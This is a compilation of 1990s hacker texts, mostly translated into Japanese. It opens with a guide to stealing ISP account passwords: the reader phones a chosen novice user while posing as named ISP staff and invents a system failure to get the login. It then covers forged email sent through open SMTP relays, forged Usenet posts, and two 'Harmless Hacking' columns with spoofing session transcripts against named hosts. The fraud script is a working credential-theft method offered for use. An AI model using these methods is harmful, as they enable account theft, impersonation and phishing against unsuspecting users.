/////////////////////////////////////////////////////////////////////// \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ /////////////////////////////////////////////////////////////////////// \\ \\ // Acquiring Account Information // \\ ================================ \\ // by // \\ -=The Loath=- \\ // [ The Great Hate ] // \\ \\ // April, 1997 // \\ \\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ /////////////////////////////////////////////////////////////////////// \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ -=Table Of Contents=- I. Acquiring Account Info A. Planning B. Who to Target C. How to get there User name and Password D. Aftermath I. Acquiring Account Info A. Planning ではアナタは他人のアカウントのPASSWDでLOG INしてみたいんだな?じゃあどうや ってそれを行なうか教えてやろう。まずターゲットとなる正規ユーザーを決めて 第一に行なう事はとは、そのユーザーのISP(Internet Service Provider)がどこ のかを調べる事である。そのISPに電話でもして、「はい。こちらはAOLのBob Wells です。お困りでしょうか?」みたいなセリフをオペレーターが聞いてきたら「あっ、 間違い電話でした」とでも言ってその場で電話を切る。この時点で何故電話を切 るか理解出来ない人達へ・・・・・ここではそのターゲットとなるISPの従業員 の実名が重要なのである。 B.Who to Target ターゲットに絞る相手を決める基準とは幾らでもあるが、私が勧めるターゲット の相手とは、インターネットに日が浅く、コンピューターにもそれほど詳しくな いが、何処かのISPにアカウントを持ってる奴である。重要な事としてそのターゲ ット(ユーザー)が登録しているISPの名前を入手すること。そうすればそのISP で働いてる連中の名前も入手出来る。他の方法として電話帳を調べ、適当に名前 を選ぶ。そこでそのISPに、まるで個人的に知ってる人のように電話をかけ「よ う!!ティム!!俺だよ!!AOLのBob Wellsだよ!」といった口調で話す。 C.How to get there User name and Password ターゲットのISPに他人のPASSWDでLOG INする事は非常に面白い部分でもある。 何故ならもし成功すれば、さらに他のISPを試したくなってくるからだ。では これが人のLOG INとPASSWDを入手する方法である。仮に仮に学校の知り合い で近所のISPに加入してる奴がいるとする。そこで事前に調べ上げたそのISPの 従業員の名前を利用してその知り合いの自宅に電話を掛ける。勿論事前にその 知り合いの電話番号も入手しなくてはならない。ではここで誰かが電話に出た とする。そこでアナタはそのISPの従業員に成り済まし「もしもし、こちらはALO のBob Wellsと申しますが、○○さん(ターゲットの名前)はいっらしゃいま すでしょうか?」と言って本人を呼び出す。 ここで本人が電話に出たらとりあえず再度自己紹介をした方がいい。そうすれ ば相手に対して安心感を与える事が出来る。そして問題のターゲットのLOG IN とPASSWDを入手する方法だが、「お客様・・・実は・・・・・私達が新しく導 入したWINDOWS NTシステム(ここでそのシステムの詳細等も説明する事を勧め る)の4分の一にあたるLOG INに異常が起きて消えてしまい、お客様のLOG IN もその一部に含まれていたのです。(とにかく適当に嘘こきまくれ)大変恐れ 入りますが、システム復帰の為にお客様のLOG INとPASSWDを頂戴させて頂きた いのですが・・・まことに申し訳ございません・・・・」とでも言えばいい。 そうすれば殆どの奴は素直にLOG INとPASSWDを教えてくれるだろう。実際に俺 の近所のAOLの登録ユーザーはこの方法で何度もダマされてる。出来れば実行の 移す前に、友人達とカンニングペーパーでも見ながら何度か練習を行なう事も 勧める。 D.Aftermath とりえあず上記の私の説明が実際に成功すれば、それで他人のLOG INとPASSWD が貰えてしまう。実際に入手したらすぐさまLOG INする事も大事である。理由 は万が一そのターゲットとなった正規ユーザーがLOG INした時に接続に失敗し たり、サーバーに繋がらないというような事が起きたら余計に怪しまれるかも しれないからである。 私が勧める事とはとりあえず5時間程システム内を検索し、とりあえず一旦 LOG OUTする。そしてanonymous emailerとかemailerでも入手し、匿名メール でターゲットに「先日は申し訳ありませんでした」みたいなメールでも送る のだ。勿論そのメールの返答が帰ってきてもけして反応しないこと。そうす ればいずれISPが異変に気づき「What the fuck?!」なんて言っても大丈夫な ようのする。そうなると最終的にそのアカウントの詳細も変更され、ユーザ ーの電話番号も表示されないようになり、しまいに入手したアカウントも使 用出来なくなるが・・・ Good Luck! +++++++++++++++++++++++++++++++++ ++ -=The Loath=- ++ ++ [ The Great Hate ] ++ ++ theloath@hackers.com ++ ++ www.hackers.com/hacker101 ++ +++++++++++++++++++++++++++++++++ ow do I send fakemail? まずオリジナルメールとして表示されたいサーバーにtelnetでPORT 25を 行う。下記の例のようにメッセージを入力する。 HELO bellcore.com MAIL FROM:Voyager@bellcore.com RCPT TO:president@whitehouse.gov DATA メッセージを入力する .(←ここでメールの内容を入力後、次の行の最初にピリオドを 入力する事を忘れないように) QUIT RFC 931の内容を導入しているサーバーは、この方法は受け付けてくれないので 注意すること。詳しくはRFC 822の“Standard for the format of ARPA Internet text messages.”を読むこと。 How do I fake posts to UseNet? INEWSを使用、下記のコマンドを入力する。 From: Newsgroups: Subject: Message-ID: Date: Organization: NEWSGROUPを設定する場合、次のラインをINEWSに書き込む必要がある。 Approved: そして自分のPOSTとTERMINALを入力すればいい。 例: From: Eric S. Real Newsgroups: alt.hackers Subject: Pathetic bunch of wannabe losers Message-ID: Date: Fri, 13 Aug 1994 12:15:03 Organization: Moral Majority お前等の殆どは哀れな奴だろう。“HACKER”という名誉ある言葉を汚し、お前の 下らないエゴのように尊大ぶる。糞くらえ、うせろ、とっととブタ箱に行け。 Eric S. Real 注:大抵のシステムはオリジナルの情報を載せる:HEADERのラインを掲載し、 場合によってはそのメッセージが何処から投稿されたかも載る。 _______________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 1 Number 1 Hacking tip of this column: how to finger a user via telnet. _______________________________________________________ Hacking、それはまるで悪魔に取り付かれたような天才コンピューター達を呼び 出し,文明開化にメスを入れることを企む内容を呼ぶ。 しかし私はHackingというのを快楽と冒険的なアプローチでコンピューターに接 する事だと思う。HACKERは本の指示通りになんてやらない。適当にいじくりまわ しては必要に応じて何かを追加し、何か問題につまずいた時、他のHACKERにそれ を教える。一部に連中は詐欺師みたいな奴だが、大抵の連中はいい奴等だ。それ か少なくても無害な連中だろう。 さらに付け加えれば、Hackingは驚くほど簡単に出来てしまう。私はこの場でア ナタ達にそれを証明しよう。 しかしHACKERになりたいと思う気以外では、これは明らかに快楽を得、友達を驚 かせ、さらにそこから女とデートを取り付ける事を目的とした行為だ。それでも しお前が女性HACKERなら、男の釘付けになるだろう。 このコラムはアナタ達に対してこの世界の入り口となる.事実、この“first Guide to (mostly) Harmless Hacking”を読んだ後アナタは大抵の奴等に印象付 けられるくらいの技が出来ることだろう。 HACKERになるには何が必要かって?それを私が教える前に、まず一つ言わせても らう。 今までHacking関連のNWEWSGROUPやML等で発言した事はあるだろうか?例えば「ハ ッカーになるには何をしたらいいんですか?」みたいな文だ。あるだろ?でもも う2度とそんな質問しなくなるぜ! あと、一部の3l1t3連中はnewbiesに対し冷淡だ。連中はまるでUNIXのマニュアルと TCP/IPの詳細ドキュメントを抱えながら母親の腹から生まれてきたかのように振る 舞い、知識の無い人間を馬鹿にする。 ********************* (Newbie note: 3l1t3, 31337, etc.とは“ELITE”の事を意味する。このアイデ アの由来は“elite”や“eleet”といった単語の発音から来ており、一部数字に 当てはめたものである。我々はこういった言葉を頻繁に使用する。 ******************** 多分ここでお前は助けを求めてくるだろう。しかしこれが沢山のHACKER達がヘル プを求めて来る連中に対して腹立つ理由なのである。 我々にとっての悩みの種とは「俺はHACKERに成りたいんだけど、プログラムとか OSとかって勉強したくないんだ。パスワードとかくれな?あとクレジットカード 番号もね」などと言ってくる連中だ。 正直なとこ、私もHACKERグループ内でこういった間抜けな発言を幾度か目にした。 こういった発言を残すと、翌日メールをチェックする時に3、000通以上にも およぶ農業、灌漑、肛門学、フランクリン ミントのdoo-dadsのコレクター、etc、 等といった内容のメールが受信されている事に気づき、その日をメール処理で終わ らせるはめになる。 我々がHACKERに成りたい人達に対して心配している事とは、仮にその人が完全に 無知な人間であっても、他人のコンピューターに侵入して甚大なダメージを与え る事が出来るという事である。 こういった無知なnewbieがどうやって他の人達のコンピューターをクラッシュさせ るかって?簡単さ。FTPやWEB上でそういった内容のプログラムを入手すればいいこ とだけさ。 こういったプログラムに感謝することだな。しかし巷で捕まったと騒がれてる“HACKER” ってのは無知なnewbie連中なんだ。 しかしこのコラムはそれらのプログラムを使用しないで実際に、それでも合法であるが 無害なHacking方法を教える。私は他のコンピューターに対して危害を与える方法 や、自らが属さない場所に入る方法等といった事を教えるつもりはないのでそのつ もりで。 ****************************** 場合によってはブタ箱行にもなる:仮にお前が危害を与えてなくてもだ。例えば 公共に公開されていないようなコンピューターに浸入した場合、お前は犯罪を犯した ことになる。そしてお前が一定のラインを越えた時点で、重罪を犯したことになる。 ************************************* ます私はInternetのHackingについて焦点をあわせる。その理由とは、インターネット 上においてそれぞれのコンピューターは外部からのコネクションを許可しているから である。つまりお前が正しいコマンドを実行すれば、“合法的”に他のコンピューター にアクセスが出来る。 勿論この意味はお前がインターネットに接続した時点から行っている行為である。 しかし私は他の連中が知らない、InternetのHOSTコンピューターにアクセスする 方法を紹介する。 後にお前は他の連中がどうやってパブリックに公開されていないHOSTに接続する か学ぶ。これは皆が出来るHACKだ。 しかし、その前にお前が絶対に必要な物が一個ある。これによりHackingをさら に簡単に行えるのだ。 SHELL ACCOUNT!!!! Shell Account”とはお前のコンピューターが登録されているISPのTERMINALとな るInternetのアカウントの事である。一度Shellを入手すればISPのHOSTと同じよ うにお前はUNIXのオペレーティングシステムを操作することが可能なのである。 注意:ISPでのテクニカルサポート連中は仮にお前がShell Accountを持ってなくても 持っていると言うかもしれない。実際ISPはShell Accountの使用を好まない。 理由は簡単、Shell Accountを持っていれば誰でもHackingが可能だからである。 しかしここで簡単にそれがShell Accountかどうか見分ける事が可能である。ま ず最初に“terminal emulation program”を使用、loginしてみる。ここでVT 100 terminal にならうプログラムが必要だ。もしお前がWINDOWS3.1やWINDOWS 95のユー ザーであれば、VT 100 terminal programは既にアクセサリプログラムとして 入っているので調べてみよう。 そして良いISPなら数日間GUEST ACCOUTを使用させてくれる。もし使用可能な らこれを入手し、それが本当にShell Accountなのか、実際に試してみる。 UNIXを知らない?もしお前が本気でHackingを学びたいのであれば、まずそれな りに詳しく書かれている本が必要だ。しかし『Secrets of Super hacker』みた いなしょうもないタイトルの本の事じゃない。私は今までに幾つもの本を購入し た。それらは厚さはあっても肝心なHOW TOが少ししかない。そこで私が勧める幾 つかの本を紹介する。 a) UNIX. 例: "The Unix Companion" Harley Hahn 著 b) Shells. I like "Learning the Bash Shell" Cameron Newham and Bill Rosenblatt著。ShellとはユーザーとUNIXのcommand interfaceとなる。 c) TCP/IP,インターネットを起動させるプロトコル。 例:"TCP/IP for Dummies" Marshall Wilensky and Candace Leiden 著 よし、余談はこんなもんで終わりだ。じゃあHACKの時間に移る。 お前はどうやって最も簡単な方法を使用してインターネット上におけるHacking経 歴をスタートさせたいか?まずTELNETでFINGER PORTを行う。 FINGERコマンドを使用した事はあるか?時々FINGERコマンドはインターネット上 のユーザー詳細を教えてくれる。基本的に下記のようにコマンドを行えばいい。 finger Joe_Schmoe@Fubar.com しかしここでJoe Schmoeの変わりに、お前が調べたい相手のメールアドレスを記 入すればいい。例えばcmeinel@techbroker.comというメールアドレスの人物を調 べたいのであれば、下記のようなfingerをコマンドする。 finger cmeinel@techbroker.com これでこの人物の何かを教えてくれるか、"access denied."と表示されFINGERを 失敗するだろう。 しかしここでもう一つ賢明な方法がある。下記のコマンドを与える。 telnet llama.swcp.com 79 このコマンドでお前はパスワード無しで指定したメールアドレス(この場合は llamaというユーザー) にアクセスできるのである。 しかし上記でのllamaや他のインターネットHOSTは一度だけコマンドを読み、それ 以降は自動的に切断されるようになっているので注意すること。次に下記のコマン ドを行う。 cmeinel このコマンドで何故PORT 79やFINGERプログラムの重要性についてをを表示させる。 じゃあここでボーナスとして他のTELNETのPORTも教えよう。例えば: telnet kitsune.swcp.com 13 と行ったら、ここのニューメキシコの時間を表示する。 (注:これで時間を表示させる) telnet slug.swcp.com 19 Will show you a good time! (意味不明) これでこのコラムは終了だ。今後詳しくTELNETやFINGERについて説明することを 約束する。 Happy hacking! ******************************************************* Want to share some kewl hacker stuph? Tell me I'm terrific? Flame me? For the first two, I'm at cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking! _______________________________________________________ Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING Ezine as long as you leave this notice at the end. To subscribe, email cmeinel@techbroker.com with message "subscribe hacker " substituting your real email address for Joe Blow's. *************************************************************** _____________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 1 Number 2 今回はどうやってFake Mail(偽メール)を送るかについて説明する−−そして どうやって偽造するかにもである。約束する。このHACKは特に簡単である! ______________________________________________________________ 30分でのHackingのヒーローになれる! どうやって友達や知り合い等をフッとばすか?巷のスーパーハッカーが出来るも っとも過激な事とはなんだろうか? それはシステム内の他人のアカウントを得る事である。 では、どうやって巷の何万というコンピューターに不正アクセスし、プログラム 等を起動させるのだろうか。どうやってコンピューター史上名を残すようなハッ カー達と同じように、こういったコンピューターにアクセスするのだろうか? 例えばRobert Morrisのようにである。 Robert Morris(ロバート モーリス)−−−彼は1990年代“Morris Worm” なる物を製作、当時のコンピューター界を恐怖に陥れたことで一躍有名になった 人物である。当然だが現在のInternet HostはWORMに対するバグの修復を施して ある。 しかし現在でもインターネット上には大量の楽しみやゲームやバグなどが存在す る。そしてこのテキストで我々が学ぶ事とは、プライベートなエリアにおいての コンピューターに対して、HACKERがこれらのコンピューターに侵入するかを、最 も一般的な方法から学ぶのである。 しかし私はみんなにコンピューター上でのプライベートな部分にまで侵入する方 法を教える気は無い。そんな事より私は独房なんて行く気は毛頭無い。 ここでアナタ達が学ぶ事とは、合法で、無害で、それでもって楽しい事である。 pulling the blinds and swearing blood oaths among your buddies who will witness you doing this hack. しかし----こういった行為を行なう際、先ず特定のPORTでTELNETの接続が出来る HOSTが必要である。例えばNETCOMなんかはこのサービスを行なわないHOSTの1つ である。Compuserve, America Online、そして他のInternet Service Providers (ISP)等もこういったサービスを行なってない。 しかし何にしたって一番のベストな方法は、先ずSHELL ACCOUNTを利用する事で ある!!もしアナタShell Accountを持っていないのなら、今すぐ入手すること である!! *********************************** Newbie note #1:SHELL ACCOUNTとはInternet accountの1つで、これでUNIXの コマンドを操作する事が可能になる。UNIXとはDOSみたいな物であり、スクリー ンにPROMPTが表示され、commandを入力して相手に指示を送る物である。UNIXと はInternet上の言語でもある。もしアナタが本格的なHACKERになりたいのなら、 UNIXを学ぶことは絶対条件である。 *********************************** しかし仮にアナタが一度もTELNETをした事が無くても、今回紹介するHACKは非常 に簡単である。アナタが使用しているInternet Service Provider(ISP)がこのサ ービスを行なっているかどうかを知るには下記の方法で行なえる。 telnet callisto.unm.edu 25 上の例はニューメキシコ大学のコンピューターを対象とした例である。ちなみに 私が入っているCompuserveではこれを行なうと自動的に蹴られてしまう。 しかし少なくてもNetcomはこのサービスを未だに行なっているし、他の安っぽい ISPも行なっているのが現状である。あと大概の大学等はこういうサービスを 行なっていない。 ****************************** Newbie note #2: どうやってSHELL ACCOUNTを得るか イエローページ等でISPの欄を調べ、そこに電話し、Shell Accountを提供してい るか直接聞くのである。普通相手は「はい、提供してますよ」なんて答えるが、 大抵の場合連中は嘘を言うので気を付けたい。と、言うにも連中はアナタがshell accountの本当の意味を分かっていないと思っているからである。もしこうなっ たら期間限定のguest accountを得る事である。金のあるISPならすぐにくれる。 そこでハックを行なうのである。 ****************************** ではまずアナタがTELNETを許可するアカウント(Shell Account)を持っている としよう。先ず下記のコマンドを行なう。 telnet callisto.unm.edu 25 もしアナタが今まで一度もTELNETを行なったことがないなら、きっと接続したい サーバーの名前だけを入力して、数字を入力しないだろう。しかしこの数字が大 変重要なのである。 ここでの25の意味とは、相手(被害者)のコンピューターに対して特定のPORT を指示しているのである。 *********************************** Newbie note #3: Ports Computer Portとは、特定の情報(インフォメーション)を指定する事を指す。 例えば自宅からのコンピューターだったら、モニター(情報のOUTPUT)、マウス &キーボード(情報のINPUT)、そしてモデム(情報のINPUT&OUTPUT)がPORTの 例となる。 しかしcallisto.unm.eduのようなインターネットのHOSTコンピューターだと、普 通のコンピューターと違う沢山のPORTがある。これらのPORTは決められた数字に よってその内容が区別されている。そしてこれらPORTはキーボードやマウスのよ うなphysical的なPortと違い、vertiual(software) portsなのである *********************************** しかしここでPORT 25には非常に楽しいとこがある。実際にTELNETで接続すれば 分かるが、PORT 25を行うとファイアーウオールにぶつからない限り、下記のよ うなメッセージが表示される。 Trying 129.24.96.10... Connected to callisto.unm.edu. Escape character is '^]'. 220 callisto.unm.edu Smail3.1.28.1 #41 ready at Fri, 12 Jul 96 12:17 MDT なんとこのサーバーはLOGINを聞いてこないで、既にREADYと表示しているので ある。 (注)このサーバーはSmail3.1.28.1を使用し、電子メールの作成と送信を行っ ている では話しを戻して上の例はどういった意味を表示しているのだろうか?もうちょ と注意深く上の表示を見てみよう。きっと次にアナタが行う行動とは、このcallisto.unm.edu のサーバー内でどういったコマンドが使用可能かを調べることであろう。そうい った場合は"help"、 "?"、それか"man"といったコマンドを使用すれば分かるこ とである。今回は下記のコマンドを使用する。 help そして以下が私の画面に表示されたメッセージである。 250 The following SMTP commands are recognized: 250 250 HELO hostname startup and give your hostname 250 MAIL FROM: start transaction from sender 250 RCPT TO: name recipient for message 250 VRFY verify deliverability of address 250 EXPN expand mailing list address 250 DATA start text of mail message 250 RSET reset state, drop transaction 250 NOOP do nothing 250 DEBUG [level] set debugging level,default 1 250 HELP produce this help message 250 QUIT close SMTP connection 250 250 The normal sequence of events in sending a message is to state the 250 sender address with a MAIL FROM command, give the recipients with 250 as many RCPT TO commands as are required (one address per command) 250 and then to specify the mail message text after the DATA command. 250 Multiple messages may be specified. End the last one with a QUIT. このコマンドのリストを表示すること事体NIFTYである。何故ならこれを行うと いうことは、自分がHACKの方法を知っているという事であり、さらにコンピュー ターに対して、どのようにHACKを行うかを指示する事も出来るからである。つま り“telnet 25”と“HELP”のコマンドだけ覚えておくのである。こ れだけ知っておけば残りのコマンドはオンラインで調べる事が出来る。だからも しアナタの記憶が私と同じように悪くても、この方法を繰り返せば30分か、も しくは30秒でHACKを学ぶ事が出来る。 ではこれらのコマンドを実際どのように使用すればいいのだろうか?もう既に分 かっているかもしれないが、これは非常に古典的な電子メールの操作も出来るの である。では何故アナタがLOGIN無しでシステム内にLOGIN出来たのか Guess why it was the point of vulnerability that allowed Robert Morris to crash the Internet? PORT 25でInternetを介して電子メールを、一つのNODEから次へと移動させる。 ほぼ自動的に送られてきた電子メールを受け取り、受け取ったシステムはその電 子メールのアドレスを調べ、それを受け取ったシステムとは無関係な電子メール だと判断すれば、次のシステムにそのメールを送信するのである。この繰り返し の結果、最終的にその電子メールは指定された相手に送られるのである。 主な場合、電子メールは送信先から送り先に直接送られるが、相手が海外といっ た遠い場所や、お互いが近くてもトラフィックが忙しい状態といった場合、他の コンピューターを介してでないと送れない。 現状において何万もの電子メールのFORWARDを許可するシステムが存在する。そ してこういった何万ものコンピューターにPASSWORD無しでアクセス出来るのも事 実なのである。さらに、後程習うがこれら何万ものコンピューターのInternet Addressを入手する事は非常に簡単なのである。 いくつかのコンピューターはセキュリティーが厳しい所もあり、そう簡単に楽し ませてはくれない。しかし他のコンピューターは甘いのでこういった場所を狙う。 我々はあのMorris Wormを制作した国に居る。では実際に何が出来るのだろうか? ではここで私が行った事を紹介する。(私のコマンドではコンピューターが返事 する際に数字は表示されていないので注意してほしい) helo santa@north.pole.org 250 callisto.unm.edu Hello santa@north.pole.org mail from:santa@north.pole.org 250 ... Sender Okay rcpt to:cmeinel@nmia.com 250 ... Recipient Okay data 354 Enter mail, end with "." on a line by itself It works!!! . 250 Mail accepted ここで私が行った事とは、自分自身にFake Mail(偽造メール)を送ったのであ る。ではここで私のMailBoxにどういったメールが送られてきたか見てみよう。 下記のメールが私のFree versionのEUDORAに送られてきたメールである。 X POP3 Rcpt: cmeinel@socrates このラインでは、X POP3が私のメールを受け取ったISPのプログラムであり、そ してそのIncomming Mailを扱ったのが、Socratesというコンピューターなのであ る。 ***************************** Evil Genius Tip:Incomming MailはPORT 110で行われる。一度TELNETで行ってみ よう。しかし大抵の110で起動されるPOPはコマンドを入力してもHELPを表示する ことはなく、一度ミスタイプを行うと切断やBOOTしてしまう。 ***************************** Return Path: 上記のメールアドレスは私が設定した偽メールアドレスである。 Apparently From: santa@north.pole.org Date: Fri, 12 Jul 96 12:18 MDT しかしApparently Fromから先の文章が大事な部分であり、注目していただきたい。 ここを見れば、この送られてきたメールが偽メールだという事が分かるのである。 Apparently To: cmeinel@nmia.com X Status: It works!!! ここで面白い部分とは、それぞれが違うヘッダ情報を表示している事である。 つまりアナタがどれだけ素晴らしいFake Mailを送れるかは、アナタがメールを 読む際に使用するプログラムによる。ではここでPINEというUNIX上で起動する 電子メールプログラムを使った時の例を紹介しよう。 Return Path: Received: from callisto.unm.edu by nmia.com with smtp (Linux Smail3.1.28.1 #4) id m0uemp4 000LFGC; Fri, 12 Jul 96 12:20 MDT これは私がそのプログラムを使用しているかを表示してしまうのである。さらに そのプログラムのバージョンまで表示してしまうのである。 Apparently From: santa@north.pole.org そしてここでも“apparently-from”である。つまりEDUDORAとPINE両方が、これ をFake Mailだと言っているのである。 Received: from santa@north.pole.org by callisto.unm.edu with smtp (Smail3.1.28.1 #41) id m0uemnL 0000HFC; Fri, 12 Jul 96 12:18 MDT Message Id: しまった!!ここではこれがFake Mailと言っている以外にさらにヤバイ事まで 表示されてしまっている!!なんとmessage IDまで表示されているのだ!つまり システムに誰がPORT 25を使用したかというLOGが残ってしまったのである。見て 分かる通り、毎回コンピューターにPORT 25でLOGINすると、その時のメールアド レスはmessage IDと共に残ってしまうのである。 Date: Fri, 12 Jul 96 12:18 MDT Apparently From: santa@north.pole.com Apparently To: cmeinel@nmia.com It works!!! もし誰かが上記の方法でFake Mailを送った際、このmessage IDが相手の尻尾を 掴む物カギとなる。つまりもしPINEを利用してがFake Mailを送るとするなら、 EDUDORAより自分の情報を完全に隠す事は難しいだろう。(ヘッダ情報を見れば 相手のメーラーを分かる) しかし−−−大抵のInternet HostにおけるPORT 25は、このcallisto.unm.edu のように防御的ではない。一部はもっと防御的であるが、当然セキュリティー を怠っているInternet Hostも存在する。事実、PORT 25のLOGを保存しないInternet Hostさえも存在する。だからヘッダ情報を完全にごまかせたと思っても、自分 が天才だと思わないように。 ***************************************** You can go to jail note:もしアナタがFake Mailを利用して犯罪行為を行おう という気なら、もう一度考えてみよう。このテキストを読んでいるという時点で、 きっと上手な偽メールを送る事も知らないし、同じように捕まった時の言い訳も 上手じゃないだろう。 ***************************************** ではここで異なる電子メールプログラム・sendmailを利用した例である。 これが私の入力したコマンドである。 telnet ns.Interlink.Net 25 その時のコンピューターの反応とは: Trying 198.168.73.8... Connected to NS.INTERLINK.NET. Escape character is '^]'. 220 InterLink.NET Sendmail AIX 3.2/UCB 5.64/4.03 ready at Fri, 12 Jul 1996 15:45 次に私は下記のように入力する。 helo santa@north.pole.org 相手の反応: 250 InterLink.NET Hello santa@north.pole.org (plato.nmia.com) そしてここまで来たら下記のように行う。(実際に反応の最初に250とは出ない) mail from:santa@north.pole.com 250 santa@north.pole.com... Sender is valid. rcpt to:cmeinel@nmia.com 250 cmeinel@nmia.com... Recipient is valid. data 354 Enter mail. End with the . character on a line by itself. It works! . 250 Ok quit 221 InterLink.NET: closing the connection. ではコンピューターはどんなメールを送信したのだろうか。以下の表示が、私が PINEで受け取ったメールのヘッダである。 Return Path: Received: from InterLink.NET by nmia.com with smtp (Linux Smail3.1.28.1 #4) id m0ueo7t 000LEKC; Fri, 12 Jul 96 13:43 MDT Received: from plato.nmia.com by InterLink.NET (AIX 3.2/UCB 5.64/4.03) id AA23900; Fri, 12 Jul 1996 15:43:20 0400 おっと、ここでInterLink.NETコンピューターは、私がPORT 25でTELNETした時の コンピューターまでバラしてしまっている。 しかしここのInternet Hostは沢山 使用されているからいいだろう。 Date: Fri, 12 Jul 1996 15:43:20 0400 From: santa@north.pole.org Message Id: <9607121943.AA23900@InterLink.NET> Apparently To: cmeinel@nmia.com It worked! OK、このでは“Apparently-From”が表示されていないので、このns.Interlink.Net はFake Mailを送るには適しているという事が分かった。でもそれなりに詳しい 奴がRecieved:を見ればこれが、Fake Mailだという事が分かってしまうが。 ではここでもう一つ違うコンピューターを使用した例を紹介しよう。例えばカリ フォルニア大学バークリー校は、その最先端な情報科学で知られている。私は あそこの連中のHostがどんなのか興味がある。そこで他のコンピューターマシン と同じように私は下記のようなコマンドを入力した。 telnet 128.32.152.164 25 そこでの相手の反応 Trying 128.32.152.164... Connected to 128.32.152.164. Escape character is '^]'. 220 remarque.berkeley.edu ESMTP Sendmail 8.7.3/1.31 ready at Thu, 11 Jul 1996 12 help 214 This is Sendmail version 8.7.3 214 Commands: 214 HELO EHLO MAIL RCPT DATA 214 RSET NOOP QUIT HELP VRFY 214 EXPN VERB 214 For more info use "HELP ". 214 To report bugs in the implementation send email to 214 sendmail@CS.Berkeley.EDU. 214 For local information send email to Postmaster at your site. 214 End of HELP info ここでは今までとちょっと違うsendmailプログラムが使用されているようだ。 さて、他にどんな異なる部分があるのだろうか? HELP mail 214 MAIL FROM: 214 Specifies the sender. 214 End of HELP info これがどうした!!ではこのコンピューターがFake Mailを送る際どんな事を行 ってくれるか調べてみよう。 MAIL FROM:santa@north.pole.org 250 santa@north.pole.org... Sender ok うーん・・・これは面白い。私はHELOと言っていないのに、相手はしっかり反応 している。これはどういう意味だろうか・・・・ RCPT TO:cmeinel@techbroker.com 250 Recipient ok DATA 354 Enter mail, end with "." on a line by itself This is fake mail on a Berkeley computer for which I do not have a password. . 250 MAA23472 Message accepted for delivery quit 221 remarque.berkeley.edu closing connection ではここでPINEに行ってヘッダ情報がどういうのか、見てみよう。 Return Path: Received: from nmia.com by nmia.com with smtp (Linux Smail3.1.28.1 #4) id m0ueRnW 000LGiC; Thu, 11 Jul 96 13:53 MDT Received: from remarque.berkeley.edu by nmia.com with smtp (Linux Smail3.1.28.1 #4) id m0ueRnV 000LGhC; Thu, 11 Jul 96 13:53 MDT Apparently To: Received: from merde.dis.org by remarque.berkeley.edu (8.7.3/1.31) id MAA23472; Thu, 11 Jul 1996 12:49:56 0700 (PDT) ここで3つある“received”に注目してみよう。私のISPのコンピューターは直 接Remarque.berkeley.eduからメールを受け取っていなく、その代わりにmerde.dis.com から受け取っている。 あっ!merde.dis.orgって誰が所持してるか知ってるぞ!だからBerkeleyのコン ピューターはこのFake Mailをセキュリティーのエキスパート、 Pete Shipleyの Internet HostにForwardedしたのである。ヒント:“merde”とは嘘の名前であ る。同じく“dis.org”もである。 ではRemarqueからのメールがどんなのか見てみよう。再度PINEを使用する。 Date: Thu, 11 Jul 1996 12:49:56 0700 (PDT) From: santa@north.pole.org Message Id: <199607111949.MAA23472@remarque.berkeley.edu> This is fake mail on a Berkeley computer for which I do not have a password. おおっ、これはなかなか面白い。これはこのメールがFakeだという事を表示して いない。さらにもともとのオリジナルコンピューターの秘密であるplato.nmia.com という名前までも隠してくれているのである。つまりこのremarque.berkeley.edu は、Fake Mailを送るには使えるコンピューターだということが分かった。(注: 最近調べたら、既にremarqueは修復されていたので、もうTELNETなどして色々い じくりまわさない方が良いだろう) しかしすべてのSENDMAILプログラムが友達的ではない。ここでatropos.c2.orgの 例を紹介しよう。 telnet atropos.c2.org 25 Trying 140.174.185.14... Connected to atropos.c2.org. Escape character is '^]'. 220 atropos.c2.org ESMTP Sendmail 8.7.4/CSUA ready at Fri, 12 Jul 1996 15:41:33 help 502 Sendmail 8.7.4 HELP not implemented うーん・・まぁたまにはこういう事もあるさ。でもとりあえず今まで通り行って みよう。 helo santa@north.pole.org 501 Invalid domain name おい、これはどういうことだい?他のSENDMAILプログラムはHELOって挨拶すれば ちゃんと返事返すのに!オーケーオーケー、では使用可能なDomain Nameを紹介 しよう。しかし使用可能なUser Nameじゃないので注意すること。 helo satan@unm.edu 250 atropos.c2.org Hello cmeinel@plato.nmia.com [198.59.166.165], pleased to meet you mail from:santa@north.pole.com 250 santa@north.pole.com... Sender ok rcpt to: cmeinel@nmia.com 250 Recipient ok data 354 Enter mail, end with "." on a line by itself Oh, crap! . 250 PAA13437 Message accepted for delivery quit 221 atropos.c2.org closing connection ではここでこのSendmailプログラムがどんなメールを送ったか見てみよう。再度 PINEを立ち上げる。 Return Path: これでFake Mailが送られた事が分かった。では詳細を見てみよう。 Received: from atropos.c2.org by nmia.com with smtp (Linux Smail3.1.28.1 #4) id m0ueqxh 000LD9C; Fri, 12 Jul 96 16:45 MDT Apparently To: Received: from satan.unm.edu (cmeinel@plato.nmia.com [198.59.166.165]) by atropos.c2.org (8.7.4/CSUA) with SMTP id PAA13437 for cmeinel@nmia.com; Fri, 12 Jul 1996 15:44:37 0700 (PDT) Date: Fri, 12 Jul 1996 15:44:37 0700 (PDT) From: santa@north.pole.com Message Id: <199607122244.PAA13437@atropos.c2.org> Oh, crap! そんなわけで、まず最初のHACKのモラルとしてInternet HostでPORT 25を使用 すれば色々と遊べる事を説明した。だからもしアナタがこれで楽しみたいので あれば、まず相手のシステムがどういうのか、事前に調べる事が重要である。 _________________________________________________________ Want to share some kewl stuph? Tell me I'm terrific? Flame me? For the first two, I'm at cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking! Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end. To subscribe, email cmeinel@techbroker.com with message "subscribe hacker " substituting your real email address for Joe Blow's. ________________________________________________________ _______________________________________________________ GUIDE TO (mostly) 